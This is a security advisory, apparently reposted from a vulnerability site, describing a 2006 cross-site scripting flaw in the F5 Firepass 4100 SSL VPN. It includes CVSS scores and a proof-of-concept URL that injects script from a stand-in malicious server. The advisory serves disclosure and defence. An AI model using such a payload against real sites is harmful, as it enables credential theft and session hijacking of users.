XSS in Firepass 4100 SSL VPN v.5.4.2 (and probably others)

2006.03.23
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

Vulnerability class : Cross-Site Scripting Discovery date : 2nd of February 2006 Remote : Yes Local : No Credit : ILION Research Labs, Geneva Switzerland Vulnerable : F5 Firepass 4100 SSL VPN v. 5.4.2 A XSS (Cross-Site-Scripting) vulnerability has been uncovered in my.support.php3 called through a Web browser on the F5 Firepass 4100 SSL VPN. This allows an attacker to submit a crafted link to users of the vulnerable Web application in order to abuse their trust and steal their authentication credentials or hijack their sessions. Trust abuse can be complete since the SSL certificate can appear as vouching for the trustworthiness of the website while the page actually displayed is hosted on a malicious third-party server (this can be done by using the <iframe> tag of IE for example). Proof-of-concept exploit : https://www.vulnerable_server.com/my.support.php3?c=1&s=username</title> <img src=http://MALICIOUS_SERVER.COM/EXPLOIT.JS>&#140;&#169;=en&charset=iso-8859- 1&uilangchar=en.iso-8859-1 where http://MALICIOUS_SERVER.COM/EXPLOIT.JS is a malicious JavaScript interpreted by the victim's navigator.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top